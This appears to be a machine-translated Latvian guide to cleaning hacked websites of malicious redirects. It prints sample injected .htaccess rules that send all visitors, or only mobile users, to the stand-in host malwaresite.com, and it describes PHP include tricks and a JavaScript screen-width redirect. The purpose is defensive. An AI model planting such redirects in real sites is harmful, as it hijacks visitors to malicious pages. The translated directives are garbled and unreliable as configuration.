1. Novirziet uz trešās puses resursiemIedomājieties situāciju: jūs apmeklējat savu vietni, bet uzreiz tiekat pārcelts uz citu “atpūtas” direktoriju vai galveno lapu, kas piedāvā pelnīt naudu Forex. Tas gandrīz noteikti nozīmē, ka tīmekļa resurss ir uzlauzts un failā .htaccess ir parādījušās vairākas jaunas rindas. Apstrāde ir vienkārša: atveriet failu, atrodiet direktīvas, kas satur adresi, uz kuru tiek veikta novirzīšana, un pēc tam izdzēsiet tās. Tātad nosacījuma malwaresite.com nepieciešamās konstrukcijas varētu būt šādas:
< IfModule mod_alias. c>Novirzīt 301 https://site/ http://malwaresite.com/ |
RewriteEngine vietnē RewriteBase/RewriteCond% (HTTP_HOST)! ^tekseo\. su [NC] RewriteRule ^(.* ) http://malwaresite.com/$1
RewriteEngine vietnē RewriteBase / RewriteCond %(HTTP_HOST) !^tekseo\.su RewriteRule ^(.*) http://malwaresite.com/$1
Sarežģītāka iespēja ir pastāvīga novirzīšana, kas rakstīta PHP. Ja pārbaudījāt, bet neko aizdomīgu neatradāt, visticamāk, problēma ir failā index.php. Pārvirzīšana šeit tiek veikta, nosūtot apmeklētājam nepieciešamās galvenes:
include("redirect.php"); Izeja();
Atcerieties - šādi fragmenti nav atrodami sākotnējā index.php, tāpēc varat tos visus droši izdzēst. Atrodiet un izdzēsiet arī iekļauto failu (mūsu piemērā tas būs redirect.php, kas atrodas saknes mapē).
Viltīgāks gājiens ir mobilo sīkrīku novirzīšana. Piekļūstot savam resursam no personālā datora, jūs nekad neatklāsiet inficēšanās faktu, bet viedtālruņu un planšetdatoru lietotāji būs nepatīkami pārsteigti, nonākot citā lapā. Šo novirzīšanu var īstenot:
1. .htaccess
Vienkāršākā metode, kuru var viegli aprēķināt. Ierīci identificē piegādātais lietotāja aģents. Tas varētu izskatīties šādi:
< IfModule mod_rewrite. c>RewriteEngine vietnē RewriteBase / RewriteCond % ( HTTP_USER_AGENT) ^.* (ipod| iphone| android).* [ NC] RewriteRule ^(.* ) $ http: //malwaresite.com/ |
RewriteEngine vietnē RewriteBase/RewriteCond %(HTTP_USER_AGENT) ^.*(ipod|iphone|android).* RewriteRule ^(.*)$ http://malwaresite.com/
2.PHP
Novirzīšana PHP tiek īstenota līdzīgi. Tālāk norādītā konstrukcija ir atrodama indeksa failā. Atkal neaizmirstiet par visuresošajiem, tostarp:
3. JavaScript
Šeit tiek pārbaudīta ekrāna izšķirtspēja, ja platums ir 480 pikseļi vai mazāks, apmeklētājs tiek novirzīts uz ļaunprātīgu vietni. Ja jūsu projektā tiek izmantota līdzīga metode, noteikti pārbaudiet šajā blokā adreses izmaiņas.